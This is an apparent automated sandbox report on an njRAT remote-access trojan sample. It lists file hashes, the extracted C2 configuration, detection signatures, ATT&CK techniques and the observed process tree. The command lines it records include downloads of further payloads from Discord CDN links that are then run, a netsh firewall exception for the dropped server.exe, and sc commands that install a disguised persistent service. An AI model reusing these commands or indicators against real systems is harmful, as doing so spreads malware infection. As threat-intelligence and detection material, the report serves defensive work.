njrat | 0cc7d034e9b01b5f02d0843e62c5ce0c79dc380fc3c126be71c8ad31ab8acad6

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10-en-20211014
submitted
27-11-2021 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe
Size

355KB
MD5

23fb23c32c346850115102c7c51d59a0
SHA1

10d8d48501447675facadf07a656aaa9668cad5a
SHA256

0cc7d034e9b01b5f02d0843e62c5ce0c79dc380fc3c126be71c8ad31ab8acad6
SHA512

8b0bd3919f9d122b02e21e33569b391f2fecb015a3a766f3c551fb9a3d2c9f8d0a5273a79532295744a0038f519a31bd0be95bdf24f0f83ce605ff43c3496f1c

Score

10^/10

njrat 1 evasion persistence suricata trojan upx

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

6.tcp.ngrok.io:14955

Mutex

278143857c93c64cb35ca3ab3e71ff74

Attributes

reg_key
278143857c93c64cb35ca3ab3e71ff74
splitter
|'|'|

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata: ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
suricata
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

extd.exeextd.exeextd.exe666.exeextd.exesetup.exeextd.exegpue.exeserver.exe

pid process

2112 extd.exe
4064 extd.exe
1836 extd.exe
4496 666.exe
4552 extd.exe
4524 setup.exe
1684 extd.exe
2076 gpue.exe
4736 server.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
2112	extd.exe
4064	extd.exe
1836	extd.exe
4496	666.exe
4552	extd.exe
4524	setup.exe
1684	extd.exe
2076	gpue.exe
4736	server.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe	upx

Loads dropped DLL 11 IoCs

Processes:

setup.exe

pid	process
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe

Drops autorun.inf file 1 TTPs
Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media
T1091

Drops file in Windows directory 5 IoCs

Processes:

cmd.exesetup.exegpue.exe

description	ioc	process
File created	C:\Windows\gpu_name.txt	cmd.exe
File created	C:\Windows\parameters.ini	setup.exe
File created	C:\Windows\proceslist.txt	setup.exe
File created	C:\Windows\gpue.exe	setup.exe
File opened for modification	C:\Windows\parameters.ini	gpue.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe	nsis_installer_2

Modifies data under HKEY_USERS 1 IoCs

Processes:

WMIC.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exegpue.exe

pid	process
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
4524	setup.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe
2076	gpue.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

server.exe

pid process

4736 server.exe

pid	process
4736	server.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

Processes:

gpue.exeWMIC.exeserver.exe

description	pid	process
Token: SeDebugPrivilege	2076	gpue.exe
Token: SeAssignPrimaryTokenPrivilege	2776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2776	WMIC.exe
Token: SeSecurityPrivilege	2776	WMIC.exe
Token: SeTakeOwnershipPrivilege	2776	WMIC.exe
Token: SeLoadDriverPrivilege	2776	WMIC.exe
Token: SeSystemtimePrivilege	2776	WMIC.exe
Token: SeBackupPrivilege	2776	WMIC.exe
Token: SeRestorePrivilege	2776	WMIC.exe
Token: SeShutdownPrivilege	2776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2776	WMIC.exe
Token: SeUndockPrivilege	2776	WMIC.exe
Token: SeManageVolumePrivilege	2776	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2776	WMIC.exe
Token: SeSecurityPrivilege	2776	WMIC.exe
Token: SeTakeOwnershipPrivilege	2776	WMIC.exe
Token: SeLoadDriverPrivilege	2776	WMIC.exe
Token: SeSystemtimePrivilege	2776	WMIC.exe
Token: SeBackupPrivilege	2776	WMIC.exe
Token: SeRestorePrivilege	2776	WMIC.exe
Token: SeShutdownPrivilege	2776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2776	WMIC.exe
Token: SeUndockPrivilege	2776	WMIC.exe
Token: SeManageVolumePrivilege	2776	WMIC.exe
Token: SeDebugPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe
Token: 33	4736	server.exe
Token: SeIncBasePriorityPrivilege	4736	server.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

gpue.exe

pid process

2076 gpue.exe

pid	process
2076	gpue.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.execmd.exesetup.execmd.exenet.execmd.execmd.execmd.execmd.exenet.exegpue.execmd.exe

description	pid	process	target process
PID 4320 wrote to memory of 3160	4320	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 4320 wrote to memory of 3160	4320	0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe	cmd.exe
PID 3160 wrote to memory of 2112	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 2112	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 2112	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4064	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4064	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4064	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 1836	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 1836	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 1836	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4496	3160	cmd.exe	666.exe
PID 3160 wrote to memory of 4496	3160	cmd.exe	666.exe
PID 3160 wrote to memory of 4496	3160	cmd.exe	666.exe
PID 3160 wrote to memory of 4552	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4552	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4552	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 4524	3160	cmd.exe	setup.exe
PID 3160 wrote to memory of 4524	3160	cmd.exe	setup.exe
PID 3160 wrote to memory of 4524	3160	cmd.exe	setup.exe
PID 3160 wrote to memory of 1684	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 1684	3160	cmd.exe	extd.exe
PID 3160 wrote to memory of 1684	3160	cmd.exe	extd.exe
PID 4524 wrote to memory of 4672	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 4672	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 4672	4524	setup.exe	cmd.exe
PID 4672 wrote to memory of 4572	4672	cmd.exe	net.exe
PID 4672 wrote to memory of 4572	4672	cmd.exe	net.exe
PID 4672 wrote to memory of 4572	4672	cmd.exe	net.exe
PID 4572 wrote to memory of 4704	4572	net.exe	net1.exe
PID 4572 wrote to memory of 4704	4572	net.exe	net1.exe
PID 4572 wrote to memory of 4704	4572	net.exe	net1.exe
PID 4524 wrote to memory of 4264	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 4264	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 4264	4524	setup.exe	cmd.exe
PID 4264 wrote to memory of 668	4264	cmd.exe	sc.exe
PID 4264 wrote to memory of 668	4264	cmd.exe	sc.exe
PID 4264 wrote to memory of 668	4264	cmd.exe	sc.exe
PID 4524 wrote to memory of 928	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 928	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 928	4524	setup.exe	cmd.exe
PID 928 wrote to memory of 1052	928	cmd.exe	sc.exe
PID 928 wrote to memory of 1052	928	cmd.exe	sc.exe
PID 928 wrote to memory of 1052	928	cmd.exe	sc.exe
PID 4524 wrote to memory of 1180	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 1180	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 1180	4524	setup.exe	cmd.exe
PID 1180 wrote to memory of 1464	1180	cmd.exe	sc.exe
PID 1180 wrote to memory of 1464	1180	cmd.exe	sc.exe
PID 1180 wrote to memory of 1464	1180	cmd.exe	sc.exe
PID 4524 wrote to memory of 1508	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 1508	4524	setup.exe	cmd.exe
PID 4524 wrote to memory of 1508	4524	setup.exe	cmd.exe
PID 1508 wrote to memory of 1816	1508	cmd.exe	net.exe
PID 1508 wrote to memory of 1816	1508	cmd.exe	net.exe
PID 1508 wrote to memory of 1816	1508	cmd.exe	net.exe
PID 1816 wrote to memory of 1908	1816	net.exe	net1.exe
PID 1816 wrote to memory of 1908	1816	net.exe	net1.exe
PID 1816 wrote to memory of 1908	1816	net.exe	net1.exe
PID 2076 wrote to memory of 2444	2076	gpue.exe	cmd.exe
PID 2076 wrote to memory of 2444	2076	gpue.exe	cmd.exe
PID 2076 wrote to memory of 2444	2076	gpue.exe	cmd.exe
PID 2444 wrote to memory of 2776	2444	cmd.exe	WMIC.exe
PID 2444 wrote to memory of 2776	2444	cmd.exe	WMIC.exe

C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe
"C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4320

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\BECE.bat C:\Users\Admin\AppData\Local\Temp\0CC7D034E9B01B5F02D0843E62C5CE0C79DC380FC3C12.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3160

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:2112

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4064

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/877176601429819402/894631295047577621/666.exe" "666.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:1836

C:\Users\Admin\AppData\Local\Temp\29946\666.exe
666.exe
3⤵
- Executes dropped EXE
PID:4496

C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4736

C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
5⤵
PID:4780

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/893540407105949760/893540461770317844/setup.exe" "setup.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:4552

C:\Users\Admin\AppData\Local\Temp\29946\setup.exe
setup.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4524

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net stop GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\SysWOW64\net.exe
net stop GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:4572

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop GPUService
6⤵
PID:4704

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc delete GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\SysWOW64\sc.exe
Sc delete GPUService
5⤵
PID:668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:928

C:\Windows\SysWOW64\sc.exe
Sc create GPUService binpath= C:\Windows\gpue.exe start= auto DisplayName= GPUService
5⤵
PID:1052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C sc description GPUService ServiceManagerForGPU
4⤵
- Suspicious use of WriteProcessMemory
PID:1180

C:\Windows\SysWOW64\sc.exe
sc description GPUService ServiceManagerForGPU
5⤵
PID:1464

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C net start GPUService
4⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\net.exe
net start GPUService
5⤵
- Suspicious use of WriteProcessMemory
PID:1816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start GPUService
6⤵
PID:1908

C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:1684

C:\Windows\gpue.exe
C:\Windows\gpue.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\SysWOW64\cmd.exe
cmd /c wmic path win32_VideoController get name > C:\Windows\gpu_name.txt
2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\29946\666.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\29946\666.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe
MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\29946\setup.exe
MD5
641eaf387f50008330a706b2998c10df

SHA1
513bfd94eb70d6e2d440d01139e96950f9d54b4c

SHA256
05f11e55137f85032b0297ee1911e09812e1c4f70871625c0e30685ad8d245c1

SHA512
d9250c6bc3fd1caae9dfb9ef582ae321cdc0cfe0fd1157346a33ba8395a8ed9cfc6895bd9cf5d71229538d3b8fb71c9a30853cc4670f0dc684cb53f352d58131

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\BECE.bat
MD5
ac04031a7577debd72a418ec7f3499e6

SHA1
c3bf80dfda04243a22e6768445d3ae5121a37c80

SHA256
6c06c8b7e2d7631dcda3e65c4bc845199e3e8c2763c161eff8fb07eea24093e7

SHA512
5299faea70d11c6cd40ef7fd4ad37eda6f54756c322df973904efbabce977b24992c7771fd68b4c05ccfe767ce636434dc6d96419e41b3706f88f41bfbb8fe2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BECC.tmp\BECD.tmp\extd.exe
MD5
139b5ce627bc9ec1040a91ebe7830f7c

SHA1
c7e8154ebed98bea9d1f12b08139d130b6836826

SHA256
d4b9b8b1f9ab2fbca7b55c4068bdcefae50ad3994924d67607fc9ae859003332

SHA512
8cc0e484ddb2e8bed4b8554e65ab8e3bfbe2a8f1c554a7aec9eac4c9555396e21c4bc2840d499ce4baffed2a4966a7d742c7c3ada58d039630b03472e322042b

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\server.exe
MD5
439445d3a414d7f7a31cba5ce78821cb

SHA1
ce9bc4603eaf4a1db0f38c43fbfb17d615691fa1

SHA256
a6bf5117896fcec02bf946a3baacf69f98f14208d0433789671d2189c8f35403

SHA512
9aa19c858574c7ffc6c0bc66ed727dfa64d8d6b6b68c17bccf3cdd7ae5c86fe378480fd222d41a8bc82b896ca020ca95987f3b9788fbb5badd882c895c99fed2

Download Submit
C:\Windows\gpue.exe
MD5
4f5546a65f13faa1552e34d301b03dfe

SHA1
47d430278d13f8d23d5d865777ca14ebf7bae296

SHA256
e172c632cd031235affc1ae38c1f18674eb069a80bba7c6358551247ed010061

SHA512
f8779f5f9bf5b776142b5d6e821bd2ed4a7618406f153d4d82cfb2ea80c4dd194b1ade72694388ad911ce1a3929f02a4cd62f347febfa15e4931e68f5f1bd5d9

Download Submit
C:\Windows\parameters.ini
MD5
a9e16c8820bc8ea84968c423771c42c1

SHA1
8a384cd91f77bc8c6a4408ea0dd0b0a4e9d6cd54

SHA256
2c78aef611fae9862278a6f5f0677686d2bdf911fa441a39b5f3bc0d028a7bc8

SHA512
71d9e01f34a625d3756580c03d8e520552ea4d68ce78ca3adf69594947014adb4ec0ccbfef1cc64b7f0961726baa69a083829ef87aadf71dd7dba9a65e29f114

Download Submit
C:\Windows\proceslist.txt
MD5
a6ed38248f19079a4503576153d91409

SHA1
0bbc351696d5fd8659f1f18c36195bd192869bc8

SHA256
e26ad6677297f6476356bb6c368c5f933165a16635c4bd6c2aad5e8d6784f5f5

SHA512
f064c6f52fe247cdb801bbcae07d1636dace09f8500460660472cb9918f75e92ebcf89c8b6aa45e7c830839a5aea323c310bf0c93d90f5d77242bb50aa86e31f

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
\Users\Admin\AppData\Local\Temp\nsoCCE7.tmp\nsExec.dll
MD5
b5a1f9dc73e2944a388a61411bdd8c70

SHA1
dc9b20df3f3810c2e81a0c54dea385704ba8bef7

SHA256
288100583f65a2b7acfc0c7e231c0e268c58d3067675543f627c01e82f6fd884

SHA512
b9c8d71b5da00f2aff7847b9ec3bd8a588afeb525f47a0df235b52f7b2233edb3928a2c8e0b493f287c923cc52a340ad6fee99822595d6591df0e97870de92a8

Download Submit
